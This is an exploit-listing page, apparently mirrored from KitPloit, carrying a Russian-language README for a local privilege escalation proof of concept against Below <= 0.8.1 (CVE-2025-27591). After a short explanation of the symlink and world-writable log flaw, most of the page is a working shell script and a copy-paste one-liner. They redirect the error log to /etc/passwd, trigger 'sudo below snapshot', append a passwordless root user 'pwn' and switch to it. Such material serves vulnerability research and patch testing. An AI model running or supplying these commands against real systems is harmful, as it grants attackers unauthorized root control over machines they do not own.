Sploitus

Exploit for CVE-2025-27591

kitploit Β· 2026-08-31

Exploit Code

MARKDOWN92 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RVZSEC-CVE-2025-27591
# Below - локальноС ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ (CVE-2025-27591)

  
  


![below-logo](https://assets.kitploit.com/production/public/readmes/31631/7da434ab7963a08aba1a52935d78e21ee732e49b6182c3f56c6f95cf2767bb21.png)   
  


Below <= v0.8.1  
**Π›ΠΎΠΊΠ°Π»ΡŒΠ½ΠΎΠ΅ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Ρ‡Π΅Ρ€Π΅Π· ΠΎΠ±Ρ‰Π΅Π΄ΠΎΡΡ‚ΡƒΠΏΠ½ΡƒΡŽ ΡΠΈΠΌΠ²ΠΎΠ»ΡŒΠ½ΡƒΡŽ ссылку Π½Π° Π»ΠΎΠ³**   
PoC-эксплойт  


  
  


* * *

### Π’Π²Π΅Π΄Π΅Π½ΠΈΠ΅

ВСрсии `Below` <= 0.8.1 содСрТат ΠΊΡ€ΠΈΡ‚ΠΈΡ‡Π΅ΡΠΊΡƒΡŽ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ локального ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ (CVE-2025-27591).  
Из-Π·Π° Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ настроСнной общСдоступной Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ Π»ΠΎΠ³ΠΎΠ² (`/var/log/below/`) ΠΈ нСбСзопасной Π»ΠΎΠ³ΠΈΠΊΠΈ Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΠΉ Π² ΠΊΠΎΠ΄ΠΎΠ²ΠΎΠΉ Π±Π°Π·Π΅ Rust, Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΉ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΠΎΠ·Π΄Π°Ρ‚ΡŒ симлинк `error_<user>.log` Π½Π° любой Ρ„Π°ΠΉΠ», ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰ΠΈΠΉ root, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€ `/etc/passwd`.

ΠŸΡ€ΠΈ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠΈ `below snapshot` с `sudo` ΠΎΠ½ ΠΏΡ€ΠΈΠ½ΡƒΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ устанавливаСт Ρ€Π΅ΠΆΠΈΠΌ `0666` Π½Π° Ρ„Π°ΠΉΠ» Π»ΠΎΠ³Π° ΠΈ записываСт Π² Π½Π΅Π³ΠΎ β€” Π΄Π°ΠΆΠ΅ Ссли это симлинк.  
Π­Ρ‚ΠΎ позволяСт Π²Π½Π΅Π΄Ρ€ΠΈΡ‚ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ с привилСгиями `root` Π±Π΅Π· пароля, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ ΠΏΠΎΠ»Π½ΠΎΠΌΡƒ доступу ΠΊ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ΅ root.

* * *

### ИспользованиС

root@kitploit:~
    
    
    git clone https://github.com/rvizx/CVE-2025-27591
    cd CVE-2025-27591
    chmod +x exploit.sh
    ./exploit.sh
    

**Π˜Π›Π˜**

Код эксплойта

root@kitploit:~
    
    
    # Title  : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
    # Author : Ravindu Wickramasinghe (aka rvz)
    # Usage  : usage: ./exploit.sh
    
    
    u=$(id -un)
    rm -f /var/log/below/error_"$u".log
    ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
    export LOGS_DIRECTORY=/var/log/below
    sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
    echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry  to /etc/passwd (now writable)
    su pwn
    

_ΠŸΡ€ΠΈΠΌΠ΅Ρ‡Π°Π½ΠΈΠ΅: Π”ΠΎΠ±Π°Π²ΠΈΠ» exploit.sh Π² README.md послС Ρ‚ΠΎΠ³ΠΎ, ΠΊΠ°ΠΊ IppSec Π² своём ΠΏΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠΈ использовал ΠΎΠ΄Π½ΠΎΡΡ‚Ρ€ΠΎΡ‡Π½ΡƒΡŽ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ вмСсто exploit.sh. ΠŸΠΎΠ΄ΡƒΠΌΠ°Π», Ρ‡Ρ‚ΠΎ Ρ‚Π°ΠΊ Π±ΡƒΠ΄Π΅Ρ‚ ΡƒΠ΄ΠΎΠ±Π½Π΅Π΅ для всСх. Бпасибо IppSec. ^^_

**Π˜Π›Π˜**

ΠžΠ΄Π½ΠΎΡΡ‚Ρ€ΠΎΡ‡Π½Π°Ρ ΠΊΠΎΠΌΠ°Π½Π΄Π° - (ΠšΠΎΠΏΠΈΡ€ΡƒΠΉ, вставляй ΠΈ выполняй)

root@kitploit:~
    
    
    u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
    

* * *

### ΠžΠΊΡ€ΡƒΠΆΠ΅Π½ΠΈΠ΅

  * Below <= v0.8.1
  * Linux ΠΏΠΎΠ΄ ΡƒΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ systemd (Ubuntu, Arch, Fedora ΠΈ Ρ‚.Π΄.)
  * ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Π² Π³Ρ€ΡƒΠΏΠΏΠ΅ `sudo` с доступом `NOPASSWD` ΠΊ `/usr/bin/below *`



* * *

### Благодарности

ΠžΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΎ ΠΈ сообщСно Matthias Gerstner @ SUSE - Π£Π²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠ΅ бСзопасности   
PoC-эксплойт - Ravindu Wickramasinhge AKA rvz